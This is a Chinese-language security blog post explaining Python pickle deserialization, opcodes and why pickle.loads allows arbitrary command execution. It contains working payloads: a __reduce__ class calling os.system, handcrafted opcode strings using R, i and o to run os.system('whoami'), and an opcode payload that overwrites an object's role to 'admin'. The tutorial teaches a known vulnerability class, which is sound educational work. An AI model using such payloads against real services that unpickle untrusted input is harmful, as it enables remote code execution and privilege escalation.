<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Rufeii" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      浅析pickle反序列化 
      
      
      |
    
     Rufeii
  </title>

  
    <link rel="apple-touch-icon" href="/images/me.jpg">
    <link rel="icon" href="/images/me.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/me.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Rufeii</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/search/">
          <a href="/search/">Search</a>
        </li>
      
        <li class="nav-item" data-path="/links/">
          <a href="/links/">Links</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">浅析pickle反序列化</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2026-05-14 00:52:05
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="Categories"></i>
                
                <span class="span--category">
                  <a href="/categories/%E6%9D%82%E9%A1%B9/" title="杂项">
                    <b>#</b> 杂项
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="什么是pickle"><a href="#什么是pickle" class="headerlink" title="什么是pickle"></a>什么是pickle</h2><p>pickle是实现python序列化和反序列化操作的模块之一。pickle可以看作是一种独立的栈语言，它由一串串opcode（指令集）组成。该语言的解析是依靠Pickle Virtual Machine （PVM）进行的。</p>
<h2 id="pickle序列化和反序列化的分析"><a href="#pickle序列化和反序列化的分析" class="headerlink" title="pickle序列化和反序列化的分析"></a>pickle序列化和反序列化的分析</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Myclass</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):                 <span class="comment">#只要对象被创建就会触发这个初始化方法</span></span><br><span class="line">        <span class="variable language_">self</span>.name = <span class="string">&#x27;rufeii&#x27;</span></span><br><span class="line">        <span class="variable language_">self</span>.age = <span class="number">19</span></span><br><span class="line">        <span class="variable language_">self</span>.language = <span class="string">&#x27;Chinese&#x27;</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;初始化触发&#x27;</span>)</span><br><span class="line"></span><br><span class="line">a = Myclass()</span><br><span class="line"><span class="built_in">print</span>(a.name)</span><br><span class="line"></span><br><span class="line"><span class="comment">#序列化</span></span><br><span class="line">a_p = pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span>(a_p)</span><br><span class="line"></span><br><span class="line"><span class="comment">#反序列化</span></span><br><span class="line">a_up = pickle.loads(a_p)</span><br><span class="line"><span class="built_in">print</span>(a_up)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(a_up.__dict__)           <span class="comment">#__dict__为对象的属性字典</span></span><br><span class="line"></span><br><span class="line">结果：</span><br><span class="line">初始化触发</span><br><span class="line">rufeii</span><br><span class="line"><span class="string">b&#x27;\x80\x04\x95M\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x07Myclass\x94\x93\x94)\x81\x94&#125;\x94(\x8c\x04name\x94\x8c\x06rufeii\x94\x8c\x03age\x94K\x13\x8c\x08language\x94\x8c\x07Chinese\x94ub.&#x27;</span></span><br><span class="line">&lt;__main__.Myclass <span class="built_in">object</span> at <span class="number">0x00000226733A5D10</span>&gt;</span><br><span class="line">&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;rufeii&#x27;</span>, <span class="string">&#x27;age&#x27;</span>: <span class="number">19</span>, <span class="string">&#x27;language&#x27;</span>: <span class="string">&#x27;Chinese&#x27;</span>&#125;</span><br></pre></td></tr></table></figure>

<p><strong>序列化分析：</strong></p>
<p>通过dumps()方法对类的实例化对象进行序列化，序列化出来的格式是二进制字节流的。</p>
<p>内容包括：1，类的定义信息（Myclass这个类来自__main__模块）  2，序列化对象属性的信息</p>
<p><strong>反序列化过程解析：</strong></p>
<p>反序列化的内容就是一个Myclass的一个实例化对象后面带一个地址</p>
<p>过程：1，找到类的定义   2，重新创造一个类的实例对象（这一点和php的有所不同，php是恢复对象）    3，恢复这个对象的属性    4，返回这个对象</p>
<p>注意反序列的过程这里涉及到后面的原理</p>
<h2 id="reduce-魔术方法"><a href="#reduce-魔术方法" class="headerlink" title="__reduce__魔术方法"></a>__reduce__魔术方法</h2><p>该魔术方法期待return一个字符串或者最好是一个元组</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">reduce</span>(<span class="params">self</span>):</span><br><span class="line">    <span class="keyword">return</span> (<span class="built_in">callable</span>, args_tuple)</span><br></pre></td></tr></table></figure>

<p><strong>callable</strong>：可调用对象（如exec，os. system，或一个类名）。<br><strong>args_tuple</strong>：传给callable的参数（必须是一个元组）。</p>
<p>可以把返回值理解成PHP中call_user_func函数的运用，第一个参数就是需要传入的类或者函数对象，后面的元组是需要传入该函数的参数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Myclass</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):                 <span class="comment">#只要对象被创建就会触发这个初始化方法</span></span><br><span class="line">        <span class="variable language_">self</span>.name = <span class="string">&#x27;rufeii&#x27;</span></span><br><span class="line">        <span class="variable language_">self</span>.age = <span class="number">19</span></span><br><span class="line">        <span class="variable language_">self</span>.language = <span class="string">&#x27;Chinese&#x27;</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;初始化触发&#x27;</span>)</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;触发成功&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> (os.system ,(<span class="string">&#x27;calc&#x27;</span>,))</span><br><span class="line"></span><br><span class="line">a = Myclass()</span><br><span class="line"></span><br><span class="line"><span class="comment">#序列化</span></span><br><span class="line">a_p = pickle.dumps(a)</span><br><span class="line"><span class="comment">#反序列化</span></span><br><span class="line">a_up = pickle.loads(a_p)</span><br><span class="line"><span class="built_in">print</span>(a_up)</span><br><span class="line"></span><br><span class="line">结果：</span><br><span class="line">初始化触发</span><br><span class="line">成功触发</span><br><span class="line"><span class="string">b&#x27;\x80\x04\x95\x1c\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\x04calc\x94\x85\x94R\x94.&#x27;</span></span><br><span class="line"><span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>其实在序列化的时候__reduce__方法就触发了，但是反序列化才是触发命令执行的。而且你看序列化出来的二进制字节都没有了对象的属性，而是__reduce__这个方法的返回值。</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">当你定义了<span class="built_in">_</span><span class="built_in">_</span>reduce<span class="built_in">_</span><span class="built_in">_</span>这个方法的时候,pickle会优先使用它的返回值来构建一个对象的数据流，</span><br><span class="line">而不是对象的<span class="built_in">_</span><span class="built_in">_</span>dict<span class="built_in">_</span><span class="built_in">_</span>。所以你看到的是reduce的值！</span><br><span class="line">至于那个0是命令执行成功的返回值</span><br></pre></td></tr></table></figure>

<h2 id="pickle反序列化漏洞成因"><a href="#pickle反序列化漏洞成因" class="headerlink" title="pickle反序列化漏洞成因"></a>pickle反序列化漏洞成因</h2><ol>
<li>Pickle数据在反序列化时自动执行Python字节码（或对象方法） </li>
<li>模块本质上不会对反序列化的内容进行校验</li>
</ol>
<p>所以正因为这两点pickle在反序列化时就会自动执行字节码，从而导致任意命令执行。</p>
<p>那么就又有疑问了？为什么Pickle数据在反序列化时自动执行Python字节码（或对象方法）？</p>
<p><strong>这才是反序列化漏洞的底层原理</strong></p>
<p>还记得上面说的反序列化的流程吗？重构对象，那么它是如何重构对象的呢？</p>
<p>重构对象意味着 pickle 不仅仅是简单地读取数据，它还会执行代码来“重建”一个完整的 Python 对象，包括它的类型、属性，甚至是初始化和方法调用。</p>
<p>先看最上面的那个demo吧！它反序列化的二进制字节流是：<br>b’\x80\x04\x95M\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x07Myclass\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x06rufeii\x94\x8c\x03age\x94K\x13\x8c\x08language\x94\x8c\x07Chinese\x94ub.’</p>
<p>那么按照流程就是先先找到类的定义去重新创造一个对象 -&gt; 对应执行的代码是：Myclass()<br>然后在恢复属性 -&gt; 执行的是：name &#x3D; ‘rufeii’这种<br>最后在返回这个对象。</p>
<p>那么对于__reduce__那个demo，在恢复对象的时候执行了对象的方法，从而触发漏洞。</p>
<h2 id="opcode利用"><a href="#opcode利用" class="headerlink" title="opcode利用"></a>opcode利用</h2><p>常用的opcode</p>
<table>
<thead>
<tr>
<th align="left">指令</th>
<th align="left">描述</th>
<th align="left">具体写法</th>
<th align="left">栈上的变化</th>
</tr>
</thead>
<tbody><tr>
<td align="left"></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="left"></th>
<th align="left"></th>
<th align="left"></th>
<th align="left"></th>
</tr>
</thead>
<tbody><tr>
<td align="left">c</td>
<td align="left">获取一个全局对象或import一个模块</td>
<td align="left">c[module]\n[instance]\n</td>
<td align="left">获得的对象入栈</td>
</tr>
<tr>
<td align="left">o</td>
<td align="left">寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）</td>
<td align="left">o</td>
<td align="left">这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈</td>
</tr>
<tr>
<td align="left">i</td>
<td align="left">相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）</td>
<td align="left">i[module]\n[callable]\n</td>
<td align="left">这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈</td>
</tr>
<tr>
<td align="left">N</td>
<td align="left">实例化一个None</td>
<td align="left">N</td>
<td align="left">获得的对象入栈</td>
</tr>
<tr>
<td align="left">S</td>
<td align="left">实例化一个字符串对象</td>
<td align="left">S’xxx’\n（也可以使用双引号、&#39;等python字符串形式）</td>
<td align="left">获得的对象入栈</td>
</tr>
<tr>
<td align="left">V</td>
<td align="left">实例化一个UNICODE字符串对象</td>
<td align="left">Vxxx\n</td>
<td align="left">获得的对象入栈</td>
</tr>
<tr>
<td align="left">I</td>
<td align="left">实例化一个int对象</td>
<td align="left">Ixxx\n</td>
<td align="left">获得的对象入栈</td>
</tr>
<tr>
<td align="left">F</td>
<td align="left">实例化一个float对象</td>
<td align="left">Fx.x\n</td>
<td align="left">获得的对象入栈</td>
</tr>
<tr>
<td align="left">R</td>
<td align="left">选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数</td>
<td align="left">R</td>
<td align="left">函数和参数出栈，函数的返回值入栈</td>
</tr>
<tr>
<td align="left">.</td>
<td align="left">程序结束，栈顶的一个元素作为pickle.loads()的返回值</td>
<td align="left">.</td>
<td align="left">无</td>
</tr>
<tr>
<td align="left">(</td>
<td align="left">向栈中压入一个MARK标记</td>
<td align="left">(</td>
<td align="left">MARK标记入栈</td>
</tr>
<tr>
<td align="left">t</td>
<td align="left">寻找栈中的上一个MARK，并组合之间的数据为元组</td>
<td align="left">t</td>
<td align="left">MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td align="left">)</td>
<td align="left">向栈中直接压入一个空元组</td>
<td align="left">)</td>
<td align="left">空元组入栈</td>
</tr>
<tr>
<td align="left">l</td>
<td align="left">寻找栈中的上一个MARK，并组合之间的数据为列表</td>
<td align="left">l</td>
<td align="left">MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td align="left">]</td>
<td align="left">向栈中直接压入一个空列表</td>
<td align="left">]</td>
<td align="left">空列表入栈</td>
</tr>
<tr>
<td align="left">d</td>
<td align="left">寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）</td>
<td align="left">d</td>
<td align="left">MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td align="left">}</td>
<td align="left">向栈中直接压入一个空字典</td>
<td align="left">}</td>
<td align="left">空字典入栈</td>
</tr>
<tr>
<td align="left">p</td>
<td align="left">将栈顶对象储存至memo_n</td>
<td align="left">pn\n</td>
<td align="left">无</td>
</tr>
<tr>
<td align="left">g</td>
<td align="left">将memo_n的对象压栈</td>
<td align="left">gn\n</td>
<td align="left">对象被压栈</td>
</tr>
<tr>
<td align="left">0</td>
<td align="left">丢弃栈顶对象</td>
<td align="left">0</td>
<td align="left">栈顶对象被丢弃</td>
</tr>
<tr>
<td align="left">b</td>
<td align="left">使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置</td>
<td align="left">b</td>
<td align="left">栈上第一个元素出栈</td>
</tr>
<tr>
<td align="left">s</td>
<td align="left">将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中</td>
<td align="left">s</td>
<td align="left">第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新</td>
</tr>
<tr>
<td align="left">u</td>
<td align="left">寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中</td>
<td align="left">u</td>
<td align="left">MARK标记以及被组合的数据出栈，字典被更新</td>
</tr>
<tr>
<td align="left">a</td>
<td align="left">将栈的第一个元素append到第二个元素(列表)中</td>
<td align="left">a</td>
<td align="left">栈顶元素出栈，第二个元素（列表）被更新</td>
</tr>
<tr>
<td align="left">e</td>
<td align="left">寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中</td>
<td align="left">e</td>
<td align="left">MARK标记以及被组合的数据出栈，列表被更新</td>
</tr>
</tbody></table>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>主要是这三个R\i\o</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># R</span></span><br><span class="line">opcode = <span class="string">b&#x27;&#x27;&#x27;cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tR.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># o</span></span><br><span class="line">opcode = <span class="string">b&#x27;&#x27;&#x27;(cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">o.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># i</span></span><br><span class="line">opcode = <span class="string">b&#x27;&#x27;&#x27;(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">ios</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">.</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>具体要结合opcode的含义来理解</p>
<h3 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Person</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, name, age</span>):</span><br><span class="line">        <span class="variable language_">self</span>.name = name</span><br><span class="line">        <span class="variable language_">self</span>.age = age</span><br><span class="line">        <span class="variable language_">self</span>.role = <span class="string">&quot;user&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">original_person = Person(<span class="string">&quot;Alice&quot;</span>, <span class="number">25</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;原始对象: name=<span class="subst">&#123;original_person.name&#125;</span>, age=<span class="subst">&#123;original_person.age&#125;</span>, role=<span class="subst">&#123;original_person.role&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">opcode = <span class="string">b&#x27;&#x27;&#x27;c__main__</span></span><br><span class="line"><span class="string">Person</span></span><br><span class="line"><span class="string">(S&#x27;Bob&#x27;</span></span><br><span class="line"><span class="string">I30</span></span><br><span class="line"><span class="string">tR&#125;(S&#x27;role&#x27;</span></span><br><span class="line"><span class="string">S&#x27;admin&#x27;</span></span><br><span class="line"><span class="string">S&#x27;password&#x27;</span></span><br><span class="line"><span class="string">S&#x27;secret123&#x27;</span></span><br><span class="line"><span class="string">S&#x27;age&#x27;</span></span><br><span class="line"><span class="string">I999</span></span><br><span class="line"><span class="string">ub.&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">person = pickle.loads(opcode)</span><br><span class="line">pickletools.dis(opcode)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;覆盖后: name=<span class="subst">&#123;person.name&#125;</span>, age=<span class="subst">&#123;person.age&#125;</span>, role=<span class="subst">&#123;person.role&#125;</span>, password=<span class="subst">&#123;person.password&#125;</span>&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;新增属性: password=<span class="subst">&#123;person.password&#125;</span>&quot;</span>)</span><br></pre></td></tr></table></figure>


      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2026/03/15/%E9%9D%B6%E6%9C%BAStream/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2026-05-14 00:52:05
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="Categories"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E6%9D%82%E9%A1%B9/" title="杂项">
                        <b>#</b> 杂项
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFpickle"><span class="toc-text">什么是pickle</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pickle%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%88%86%E6%9E%90"><span class="toc-text">pickle序列化和反序列化的分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#reduce-%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="toc-text">__reduce__魔术方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="toc-text">pickle反序列化漏洞成因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#opcode%E5%88%A9%E7%94%A8"><span class="toc-text">opcode利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-text">命令执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96"><span class="toc-text">变量覆盖</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/rufeii/rufeii.github.io">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="/">Copyright © 2026 Rufeii</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        


        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E6%B5%85%E6%9E%90pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96 + '&url=' + https%3A%2F%2Frufeii.github.io%2F2026%2F05%2F13%2F%25E6%25B5%2585%25E6%259E%2590pickle%25E5%258F%258D%25E5%25BA%258F%25E5%2588%2597%25E5%258C%2596%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://rufeii.github.io/2026/05/13/%E6%B5%85%E6%9E%90pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
